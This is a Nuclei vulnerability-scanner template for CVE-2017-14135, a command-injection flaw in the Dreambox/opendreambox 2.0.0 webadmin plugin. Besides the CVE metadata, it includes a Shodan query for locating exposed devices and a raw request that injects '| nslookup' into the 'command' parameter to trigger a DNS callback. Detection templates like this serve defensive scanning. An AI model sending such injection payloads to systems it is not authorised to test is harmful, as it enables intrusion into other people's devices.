nuclei-templates/cves/2017/CVE-2017-14135.yaml

43 lines
1.2 KiB
YAML

id: CVE-2017-14135
info:
name: Dreambox 2.0.0 RCE
author: alph4byt3
severity: critical
description: enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py in the webadmin plugin for opendreambox 2.0.0 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the command parameter to the /script URI
reference:
- https://the-infosec.com/2017/05/12/from-shodan-to-rce-opendreambox-2-0-0-code-execution/
- https://www.exploit-db.com/exploits/42293
- https://nvd.nist.gov/vuln/detail/CVE-2017-14135
tags: cve,cve2017,dreambox,rce
metadata:
shodan-query: title:"Dreambox WebControl"
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2017-14135
cwe-id: CWE-78
requests:
- raw:
- |
GET /webadmin/script?command=|%20nslookup%20{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "/bin/sh"
- "/usr/script"
condition: and
- type: word
part: interactsh_protocol
words:
- "dns"
- type: status
status:
- 200